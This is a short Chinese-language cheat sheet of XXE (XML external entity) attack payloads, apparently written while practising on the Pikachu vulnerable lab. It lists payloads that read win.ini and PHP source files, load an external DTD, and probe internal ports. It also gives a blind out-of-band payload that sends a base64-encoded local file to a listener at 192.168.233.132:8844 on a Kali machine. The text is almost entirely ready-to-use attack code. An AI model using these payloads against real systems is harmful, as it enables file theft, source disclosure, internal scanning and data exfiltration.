1.POC:攻击测试
<?xml version="1."?>
<!DOCTYPE foo [
<!ENTITY xxe "密码">]>
<foo>&xxe;</foo>
2.EXP:查看文件
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<foo>&xxe;</foo>
3.EXP查看源码
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=D:/phpStudy_pro/WWW/pikachu/vul/rce/rce.php"> ]>
<foo>&xxe;</foo>
4.EXP:DTD外部调用
1.DTD
<!ENTITY evil SYSTEM "file:///C:/windows/win.ini">
<!DOCTYPE foo
[<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://127.0.0.1:80/1.DTD" >
%xxe;
]>
<foo>&evil;</foo>
5.EXP:探测内网存活主机与开放端口
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY>
<!ENTITY rabbit SYSTEM "http://127.0.0.1:80">]>
<x>&rabbit;</x>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY>
<!ENTITY rabbit SYSTEM"mysql://127.0.0.1:3306">]>
<x>&rabbit;</x>
81端口会转圈几秒钟 说明没开这个端口
6.EXP:无回显探测
2.DTD
<!ENTITY % start "<!ENTITY % send SYSTEM 'http://192.168.233.132:8844/?%file;'>">
%start;
1.txt 123456789ws
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "http://127.0.0.1/2.DTD">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt">
%remote;
%send;]>
KALI监听端口